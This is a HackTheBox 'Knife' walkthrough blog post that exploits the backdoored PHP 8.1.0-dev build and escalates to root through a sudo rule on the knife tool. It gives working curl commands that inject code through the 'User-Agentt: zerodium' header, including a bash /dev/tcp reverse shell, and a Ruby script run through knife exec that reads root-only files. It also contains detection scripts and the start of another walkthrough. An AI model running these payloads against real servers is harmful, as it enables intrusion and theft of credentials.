HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it. Hocho Knife, an #Easy #Linux machine created by MrKN16H, went live 22 May 2021 at 19:00:00 UTC.

😜Let's start the journey...

🔐Enumeration🔰


💉From the Dmitry result one thing caught my eye: it is an Apache httpd server instead of the nginx that most HackTheBox machines run.


🔰We can find 2 open ports. On port 80 we can see a web page.

🔧As the latest Apache httpd release is 2.4.46, there could be a known vuln in 2.4.41, so I looked for one on the web.

🗽Looking for it I stumbled upon this Rapid7 post: https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/.

🔰But there is one catch with this exploit: the mod_proxy_ftp module must be enabled and there must be an FTP backend, neither of which we know anything about.

🖥️Web-Visiting🛡️

🤔We can find this static page, and there is nothing interesting in it.


🔐Looking at the source code I found pen.js, which looked interesting, but on inspection there was nothing of interest in it.
I also added knife.htb to /etc/hosts to look for sub-domains, but interestingly that served the default nginx page.


😜This was interesting, but let's go back to the main page.
Looking for vulnerabilities I found one interesting thing: PHP 8.1.x-dev was backdoored by some hackers.


😏You can find articles on it:
https://techbeacon.com/security/php-backdoored-git-hack-its-no-joke-so-don't-be-fool
https://www.welivesecurity.com/2021/03/30/backdoor-php-source-code-git-server-breach/
This is interesting because the server is leaking the version of PHP.


☢️Wappalyzer detected it.
Looking through a bunch of articles I finally came to this one, which shows how the backdoor planted by those troll hackers can be exploited:
https://blog.csdn.net/zy15667076526/article/details/116447864

💉The website is originally in Chinese, but Google Translate works fine.
So let's see whether the server's PHP is the dev version or not.


$ curl -i http://10.10.10.241

🔐Looking at the X-Powered-By header we can say that we are indeed in luck: the version is PHP/8.1.0-dev.

💉Exploitation☢️

😏Reading through the article I found out that the backdoor is triggered through the User-Agentt header (note the double t, as used in the commands below) to execute code.
The header value has to start with the string zerodium, which is also the name of one of the leading zero-day acquisition firms.

🤔So let's try the PoC for this exploit.


$ curl -i -s -k -H 'User-Agentt: zerodiumvar_dump(2*3);' http://10.10.10.242/

💉Looks like we triggered the RCE; let's get going and try to execute system commands.

$ curl -i -s -k -H 'User-Agentt: zerodiumsystem("id");' http://10.10.10.242/

🔐Looks like the web server is running as james, so that is one less step for us.
Let's get a reverse shell.


$ curl -i -s -k -H $'User-Agentt: zerodiumsystem("bash -c \'bash -i >& /dev/tcp/ip/port 0>&1\'");' http://10.10.10.242

🔐And boom, we have the shell😜

nc -nvlp 4242

listening on [any] 4242 ...
connect to [] from (UNKNOWN) [10.10.10.242] 60452
bash: cannot set terminal process group (966): Inappropriate ioctl for device
bash: no job control in this shell
id
id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:/$ 
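A detection-side counterpart to the exploitation above, added here as an example and not part of the original post: it scans raw HTTP requests and responses for the User-Agentt/zerodium trigger and for the X-Powered-By version leak that gave the box away. The sample traffic is constructed, not captured from the machine.

```python
"""Flag the PHP 8.1.0-dev backdoor trigger and the version leak in captured HTTP traffic."""
import re

# The backdoor is reached through the misspelled "User-Agentt" header whose
# value begins with "zerodium"; everything after the prefix is the injected code.
TRIGGER_HEADER = "user-agentt"
TRIGGER_PREFIX = "zerodium"
# X-Powered-By advertising the compromised dev build (what curl -i showed above).
LEAKY_VERSION = re.compile(r"PHP/8\.1\.0-dev", re.IGNORECASE)


def parse_headers(raw):
    """Split raw HTTP text into (start line, {lowercased header name: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def check_request(raw):
    """Return a finding if the request carries the backdoor trigger, else None."""
    start, headers = parse_headers(raw)
    value = headers.get(TRIGGER_HEADER, "")
    if value.lower().startswith(TRIGGER_PREFIX):
        injected = value[len(TRIGGER_PREFIX):].strip()
        return f"backdoor trigger in '{start}': injected code {injected!r}"
    return None


def check_response(raw):
    """Return a finding if the response discloses the backdoored PHP build, else None."""
    _, headers = parse_headers(raw)
    powered = headers.get("x-powered-by", "")
    if LEAKY_VERSION.search(powered):
        return f"vulnerable build disclosed: X-Powered-By: {powered}"
    return None


# Constructed sample traffic (not captured from the box) so the script runs offline.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    'GET / HTTP/1.1\r\nHost: knife.htb\r\nUser-Agentt: zerodiumsystem("id");\r\n\r\n',
]
SAMPLE_RESPONSE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.0-dev\r\n\r\n<html></html>"
```

Feed it request/response text from a proxy or pcap export; a plain User-Agent header is ignored, only the misspelled trigger header with the prefix is reported.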

🔰User Privilege 😜


1 - Go to the home directory: cd home
2 - Then go to James's directory: cd james
3 - List and cat user.txt: ls ; cat user.txt

🔐Root Access😜

🔰Now that we have a stable shell, let's enumerate for PrivEsc.

☢️Enumeration

james@knife:~$ cat ex.rb 
puts File.read('/etc/shadow')

😏Looking into the user's home directory we can see an interesting Ruby file which can read /etc/shadow, but the catch is that we don't have ruby on the box, or at least not on the expected path under the expected name.

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

Analysing the file /usr/bin/knife:

james@knife:~$ file /usr/bin/knife 
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife

🔐It's a symbolic link to /opt/chef-workstation/bin/knife.
Looking at the directory /opt/chef-workstation we can see it is a Ruby installation.

james@knife:~$ ls /opt/chef-workstation/
bin  components  embedded  gem-version-manifest.json  gitbin  LICENSE  LICENSES  version-manifest.json  version-manifest.txt

☢️So basically on this box Ruby code can be run using /usr/bin/knife.
Running /usr/bin/knife we get the big help menu.

james@knife:~$ sudo /usr/bin/knife

james@knife:~$ cd /tmp
james@knife:/tmp$ echo 'puts File.read("/root/root.txt")' > ex.rb

😏Now let's run our ex.rb script.

james@knife:/tmp$ sudo /usr/bin/knife exec ex.rb


!!!!!!Rooted!!!!!
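An added example (not the box's or Chef's own tooling) that audits sudo -l output the way this privesc was found by hand: it parses the rule line, resolves symlinks like file did, and flags commands whose normal features run user-supplied code. The sample rule and the symlink map are constructed from the output above, and the tool table is illustrative only.

```python
"""Audit `sudo -l` output for passwordless root rules on tools that run user-supplied code."""
import os
import re

# Illustrative, not exhaustive: each tool's documented way of running arbitrary code.
CODE_EXEC_TOOLS = {
    "knife": "knife exec <script.rb> evaluates the script with the embedded Ruby",
    "ruby": "ruby -e <code> / ruby <script.rb> evaluates arbitrary Ruby",
}

# Matches rule lines such as "    (root) NOPASSWD: /usr/bin/knife" or "(ALL : ALL) ALL".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [(runas tokens, tags, command), ...] from `sudo -l` output; other lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = set(m.group("runas").replace(":", " ").split())
        tags = set(m.group("tags").replace(":", " ").split())
        for cmd in m.group("cmds").split(","):
            rules.append((runas, tags, cmd.strip()))
    return rules


def audit(text, resolve=os.path.realpath):
    """Return findings for rules that reach root; `resolve` follows symlinks (swappable for tests)."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        if not runas & {"root", "ALL"}:
            continue
        auth = " ".join(sorted(tags)) or "password required"
        if cmd == "ALL":
            findings.append(f"ALL commands as root ({auth})")
            continue
        path = cmd.split()[0]
        target = resolve(path)  # /usr/bin/knife -> /opt/chef-workstation/bin/knife on this box
        link = f" -> {target}" if target != path else ""
        for name in {os.path.basename(path), os.path.basename(target)}:
            if name in CODE_EXEC_TOOLS:
                findings.append(f"{path}{link} as root ({auth}): {CODE_EXEC_TOOLS[name]}")
    return findings


# Constructed copy of the rule shown on this page plus a symlink map standing in for the filesystem.
SAMPLE_SUDO_L = "User james may run the following commands on knife:\n    (root) NOPASSWD: /usr/bin/knife\n"
SAMPLE_LINKS = {"/usr/bin/knife": "/opt/chef-workstation/bin/knife"}
```

On a live host call audit(open_output) with the default resolver so the symlink is followed on disk; the fix for this box is to drop the NOPASSWD root rule for knife or restrict it to specific subcommands.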



Comments

  1. Sir, I have a doubt: while getting the reverse shell, as we are able to run commands we can get a reverse shell by running the payload, but why did you run the bash -c payload?
  2. Your style is so unique compared to other people I have read stuff from. Many thanks for posting when you have the opportunity. Guess I will just bookmark this site. Cerberus FTP Server Enterprise
  3. Brother, your pen had fallen and was found; it is here at Senuli print house..

Luanne is a machine on the HackTheBox. Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated. This article will show how to hack Luanne box and get user.txt and root.txt. 😜Background😜 Luanne is a retired vulnerable VM from Hack The Box. 🔰Information Gathering Let’s start with a masscan probe to establish the open ports in the host. # masscan -e tun0 -p1-65535,U:1-65535 10.10.10.218 --rate=1000 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-02 07:55:24 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 9001/tcp on 10.10.10.218 Discovered open port 22/tcp on 10.10.10.218 Discovered open port 80/tcp on 10.10.10.218 Open port 9001/tcp looks interesting. Let’s do one better with nmap scanning the discover...